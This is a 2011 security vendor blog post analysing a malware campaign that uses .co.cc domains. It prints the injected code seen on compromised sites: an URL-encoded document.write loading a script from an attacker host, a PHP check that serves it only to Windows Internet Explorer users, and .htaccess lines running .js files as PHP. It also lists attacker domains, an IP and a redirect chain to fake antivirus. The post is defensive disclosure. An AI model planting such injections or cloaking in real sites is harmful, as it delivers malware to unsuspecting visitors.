• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Malware update: .co.cc malicious entries

January 21, 2011David Dede

0
SHARES
FacebookTwitterSubscribe

For the last weeks (actually months), we’ve been tracking a large number of malware from .co.cc domains. It seems that every .co.cc domain we find is being used to host either malware or spam.

One of the techniques we are seeing to spread malware is by hiding the .co.cc domain encoded inside a javascript file. Something like this:

Document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2D%61%6E%61%6C%79%74%69%73%63%2E%63%6F%2E%63%63%2F%35%30%22%3E%3C%2F%73%63%72%69%70%74%3E"));

This malware is detected by our scanner as RKS5.

Another interesting thing about this malware is that it is only displayed to users running Windows and Internet explorer, since it has the following check:

<?php $de="HTTP_USER_AGENT“;$ar=$_SERVER[$de];if(stristr($ar,”MSIE“)&&stristr($ar,”Windows“))echo "Document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%77%64%64%2E%63%6F%2E%63%63%2F%34%31%22%3E%3C%2F%73%63%72%69%..74%3E`));”

In addition to that, the .htaccess is modified so that the above PHP code can be executed from inside the javascript file. This is what is added:

AddHandler php5-script .js
AddType application/x-httpd-php .js

On all the affected sites, multiple backdoors are also added to make sure the attackers can remain in control of the site. Multiple domains are being used as intermediaries, all of them hosted at 91.193.194.155 (and are not blacklisted by Google):

http://google-analytisc.co.cc
http://oiwdd.co.cc
http://pojdue.co.cc

The common malware path is: http://pojdue.co.cc/32 -> http://oddwsw.co.cc/info.php?n=32 -> Fake AV (and similars).

If your site is infected with any of those, we can clean it up for you: http://sucuri.net

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware Infections, WordPress SecurityTags: Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

WordPress Security Course

The Anatomy of Website Malware Webinar

WordPress Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.